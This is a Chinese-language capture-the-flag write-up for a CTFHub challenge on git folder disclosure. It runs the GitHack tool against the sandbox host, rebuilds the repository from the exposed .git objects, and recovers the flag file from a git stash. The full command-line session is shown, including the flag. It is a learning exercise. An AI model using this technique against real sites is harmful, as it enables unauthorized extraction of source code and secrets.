当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题。
第一步
──(root㉿kali)-[~/Downloads/GitHack-master]
└─# python2 GitHack.py http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/root/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800'...
fatal: 仓库 'http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-3d7b5c38c41a690e.sandbox.ctfhub.com:10800/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示: git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main'、'trunk' 和 'development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示: git branch -m <name>
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/9a/814d0ab6196e45c305fb34dd562a0996a38fa0
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/5e/ac998306c334f4d66f6df404ffd09698720000
[*] objects/5e/9410afa84aa32a004016a7bb6b56aa163f0a72
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/70/6546276aaa3cd7eb8b5906cf35242f664a11de
[*] objects/e3/58b09f4cb4e5800dd20e1aa6758bf80811001a
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Fetch Commit Objects
[*] objects/4f/d799714fef05c2fd5b7ff82546de7f2fd16957
[*] objects/87/4a65c013d4aceb1bab782f8290851097801c69
[*] objects/f7/65c3c922115e7b3d1974e422f2bad433794e52
[*] objects/55/00acf915f3e21f4dfde7b997e78c48f9319925
[*] Fetch Commit Objects End
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /root/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800
第二步
┌──(root㉿kali)-[~/Downloads/GitHack-master]
└─# cd dist
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# ll
总用量 4
drwxr-xr-x 3 root root 4096 10月 30 07:28 challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist]
└─# cd challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# ll
总用量 8
-rw-r--r-- 1 root root 494 10月 30 07:28 50x.html
-rw-r--r-- 1 root root 143 10月 30 07:28 index.html
第三步
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# git stash list
stash@{0}: WIP on master: 5eac998 add flag
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# git stash pop
冲突(修改/删除):225112542515187.txt 在 Updated upstream 中被删除,在 Stashed changes 中被 修改。225112542515187.txt 的 Stashed changes 版本被保留。
位于分支 master
未合并的路径:
(使用 "git restore --staged <文件>..." 以取消暂存)
(酌情使用 "git add/rm <文件>..." 标记解决方案)
由我们删除: 225112542515187.txt
修改尚未加入提交(使用 "git add" 和/或 "git commit -a")
贮藏条目被保留以备您再次需要。
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─# cat 225112542515187.txt
ctfhub{3e561fa5af922973104bc108}
┌──(root㉿kali)-[~/Downloads/GitHack-master/dist/challenge-3d7b5c38c41a690e.sandbox.ctfhub.com_10800]
└─#